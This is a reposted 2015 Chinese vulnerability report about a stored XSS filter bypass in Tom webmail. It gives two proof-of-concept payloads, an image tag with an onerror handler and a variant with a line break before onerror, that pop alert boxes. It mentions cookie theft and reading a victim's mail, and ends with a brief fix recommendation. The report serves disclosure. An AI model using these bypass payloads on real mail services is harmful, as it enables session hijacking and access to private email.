网站地图    收藏   

主页 > 后端 > 网站安全 >

tom邮箱存储型xss xssfilter bypass技巧 - 网站安全

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] 邮箱漏洞 支持任何浏览器 随便都可以获取cookie什么的 然后利用特殊浏览器查看此人的邮件 或者做做其他事情跨站代码iimage src=x/ionerror=#39;alert(1)#39;可爱的xss小弹框修复方案:邮件的过...

邮箱漏洞 支持任何浏览器 随便都可以获取cookie什么的 然后利用特殊浏览器查看此人的邮件 或者做做其他事情
跨站代码
 
<i><image src="x</i>"onerror='alert(1)'>
 

可爱的xss小弹框
 
 
 
修复方案:

邮件的过滤还是不严格 之前也看到过一个
 
 
<img src=x "此处打个回车"
onerror='alert(/xss/)'
>
后来改掉了 但是 依然过滤的不好
 
希望在邮箱过滤方面严格控制 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论